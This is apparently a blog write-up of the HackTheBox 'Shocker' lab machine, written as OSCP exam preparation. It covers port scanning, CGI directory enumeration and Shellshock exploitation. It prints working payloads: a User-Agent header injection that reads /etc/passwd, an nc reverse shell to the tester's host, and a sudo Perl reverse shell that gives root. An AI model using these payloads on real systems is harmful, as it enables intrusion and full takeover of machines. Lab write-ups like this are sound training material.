TJnull OSCP Prep Series
HackTheBox: Shocker [OSCP Prep]

HackTheBox: Shocker [OSCP Prep]


  • OS: Linux 🐧
  • Difficulty: Easy πŸ˜‡
  • Release: 30 Sep 2017 πŸ“…
  • IP: 10.10.10.56 πŸ’»
  • Box Creator: mrb3n 😎

Hello there guys. Welcome to my 5th post on the TJnull OSCP Prep Series. Today we’re going to be discussing Shocker from HackTheBox.

Let’s begin with a full Nmap scan port scan to see what open ports we can find. I’ve used Rustscan because it provides faster Nmap results:

$ rustscan -a 10.10.10.56 -r 1-65535 -b 65 -- -sV -sC -Pn
PORT     STATE SERVICE REASON  VERSION
80/tcp   open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
|   256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds

Usually, the SSH service is running on port 22 but here it runs on port 2222. This could happen due to a number of reasons

  • The sysadmin is trying to hide SSH service being detecting by common nmap scans.
  • This might be a backdoor which another attacker has setup.

Let’s keep SSH in the back of our mind for now and move on with HTTP. I started directory busting with dirsearch

$ dirsearch -u "http://10.10.10.56/"

Target: http://10.10.10.56/

[22:31:54] Starting: 
[22:32:01] 403 -  297B  - /.ht_wsr.txt
[22:32:02] 403 -  300B  - /.htaccess_orig
[22:32:02] 403 -  298B  - /.htaccess_sc
[22:32:02] 403 -  301B  - /.htaccess_extra
[22:32:02] 403 -  298B  - /.htaccessBAK
[22:32:02] 403 -  300B  - /.htaccess.orig
[22:32:02] 403 -  300B  - /.htaccess.bak1
[22:32:02] 403 -  298B  - /.htaccessOLD
[22:32:02] 403 -  302B  - /.htaccess.sample
[22:32:02] 403 -  299B  - /.htaccessOLD2
[22:32:02] 403 -  290B  - /.htm
[22:32:02] 403 -  291B  - /.html
[22:32:02] 403 -  300B  - /.htaccess.save
[22:32:02] 403 -  296B  - /.htpasswds
[22:32:02] 403 -  297B  - /.httr-oauth
[22:32:02] 403 -  300B  - /.htpasswd_test
[22:32:46] 403 -  294B  - /cgi-bin/
[22:33:03] 200 -  137B  - /index.html
[22:33:26] 403 -  299B  - /server-status
[22:33:26] 403 -  300B  - /server-status/

Task Completed

We get a bunch of locations with 403 (Forbidden). But among them, the /cgi-bin stands out to me.

/cgi-bin directory is where you put all of your CGI scripts. CGI scripts are simply external executable programs to provide extended functionality to the web server. You can learn more here.

Let’s try to hunt down some cgi-scripts that lives in the /cgi-bin directory.

$ dirsearch -u http://10.10.10.56/cgi-bin -e php,py,js,sh

Target: http://10.10.10.56/cgi-bin/

[22:57:54] Starting: 
[22:58:00] 403 -  305B  - /cgi-bin/.ht_wsr.txt
[22:58:00] 403 -  308B  - /cgi-bin/.htaccess.bak1
[22:58:00] 403 -  308B  - /cgi-bin/.htaccess.orig
[22:58:00] 403 -  308B  - /cgi-bin/.htaccess.save
[22:58:00] 403 -  310B  - /cgi-bin/.htaccess.sample
[22:58:00] 403 -  309B  - /cgi-bin/.htaccess_extra
[22:58:00] 403 -  306B  - /cgi-bin/.htaccess_sc
[22:58:00] 403 -  307B  - /cgi-bin/.htaccessOLD2
[22:58:00] 403 -  308B  - /cgi-bin/.htaccess_orig
[22:58:00] 403 -  299B  - /cgi-bin/.html
[22:58:00] 403 -  306B  - /cgi-bin/.htaccessOLD
[22:58:00] 403 -  298B  - /cgi-bin/.htm
[22:58:00] 403 -  306B  - /cgi-bin/.htaccessBAK
[22:58:01] 403 -  308B  - /cgi-bin/.htpasswd_test
[22:58:01] 403 -  304B  - /cgi-bin/.htpasswds
[22:58:01] 403 -  305B  - /cgi-bin/.httr-oauth
[22:59:01] 200 -  118B  - /cgi-bin/user.sh

Task Completed

/cgi-bin/user.sh looks interesting to us. This is what we get when executing the file:

Figure 1.0

.sh runs bash. Old versions of bash are vulnerable to shellshock. You can learn more about shellshock here and here. Let’s try to exploit shellshock.

Exploitation

Payload (Dump /etc/passwd):

() { :; }; echo; /bin/bash -c 'cat /etc/passwd'

The idea is to inject the payload into an HTTP header. In this case, we are trying to inject the payload into the User-Agent header.

curl http://10.10.10.56/cgi-bin/user.sh -H "User-Agent: () { :; }; echo; /bin/bash -c 'cat /etc/passwd'"
Figure 1.1: Content of the /etc/passwd file

Now let’s get a shell shall we:

curl http://10.10.10.56/cgi-bin/user.sh -H "User-Agent: () { :; }; echo; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.17 1337 >/tmp/f'"

Post-Exploitation

List programs with sudo permissions.

Figure 1.2: sudo -l

Perl is runnable as root with no prompt to enter any password

sudo -u root perl -e 'use Socket;$i="10.10.14.17";$p=1338;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Get a reverse shell connection with root permissions.

Figure 1.3: Got a root shell

I hope you have learned something valuable by reading my write-up. If you like this post please share it with your fellow hackermates and if you have any questions & suggestions please feel free to post them down in the comments. I’d love to hear and learn from you.

If you enjoyed this write-up show me some ❀️ by giving me some respect πŸ’― at [email protected] which helps & motivates me to create content like this for the awesome hacking community. Have a great day guys πŸ‘‹. See you in the next post.

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments